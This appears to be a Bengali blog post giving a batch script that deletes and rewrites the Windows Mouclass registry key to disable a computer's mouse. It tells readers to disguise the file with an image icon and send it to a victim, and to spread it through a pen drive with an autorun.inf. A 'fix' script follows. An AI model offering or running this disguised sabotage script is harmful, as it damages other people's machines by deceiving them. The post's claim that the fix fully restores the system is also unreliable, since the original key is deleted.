শুরু করলামঃ
১। নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন pp.bat নামে@echo off set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4এখন এই ফাইলটির ইমেজ চেঞ্জ করে কাউকে সেন্ড করুন। এটা ক্লিক করলেই মাউস অচল হয়ে যাবে। (আর যদি পেন ড্রাইভ এর মাঝে করতে চান স্টেপ ২ দেখুন তবে এই ফাইল টাও লাগবে)
২। এবার নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন autorun.inf নামে
[autorun] Open=pp.bat Action=Mouse Disable৩। pp.bat নাম না দিয়ে যদি অন্য কিছু দেন তাহলে কিন্তু কাজ করবে না। অন্য নাম দিতে চাইলে ২ নং কোডিং এর ২ নং লাইনের pp.bat নাম বাদ দিয়ে নিজের নাম দিন এবং ১নং কোডিং ও একি নামে সেভ করা থাকতে হবে।
সমাধান দেখুন
১। হয়ত আপনি যাকে এটাক করতে চাচ্ছেন সেই আপনার আগে এই পোস্ট টি পড়েছে এবং এর মাঝেই আপনাকে এটাক করে ফেলেছে তাহলে নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন bcapp.bat নামে।@echo off set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 1২। এবার এটি ক্লিক করলেই মাউস সচল হয়ে যাবে আবার।
কোন মন্তব্য নেই:
একটি মন্তব্য পোস্ট করুন